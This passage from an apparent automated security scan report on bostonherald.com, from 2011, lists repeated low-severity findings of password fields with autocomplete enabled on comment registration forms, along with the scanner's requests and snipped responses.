5.3. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.4. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:09:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.5. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.6. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.7. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:41:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 98783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.8. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.9. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.10. http://www.bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.11. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.12. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.13. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
